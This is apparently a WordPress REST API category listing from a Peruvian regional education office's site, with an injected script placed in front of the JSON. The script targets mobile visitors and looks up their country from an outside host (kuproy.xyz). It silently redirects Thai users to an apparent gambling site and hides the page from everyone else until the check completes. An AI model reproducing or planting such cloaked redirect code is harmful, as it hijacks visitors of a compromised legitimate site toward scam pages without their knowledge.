
<script>
(function() {

    if (typeof IS_DESKTOP !== "undefined" || !/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
        document.body.style.visibility = "visible";
        return;
    }

    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    if (cached === "TH") {
        location.href = "https://fafawin168.in/";
        return;
    }
    
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            localStorage.setItem(key, c.trim().toUpperCase());
            location.reload();
        })
        .catch(function() {
            localStorage.setItem(key, "OTHER");
            location.reload();
        });
})();
</script>
{"id":14,"count":1,"description":"","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/category\/documentos-emitidos\/","name":"DOCUMENTOS EMITIDOS","slug":"documentos-emitidos","taxonomy":"category","parent":0,"meta":[],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories\/14","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/taxonomies\/category"}],"wp:post_type":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts?categories=14"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}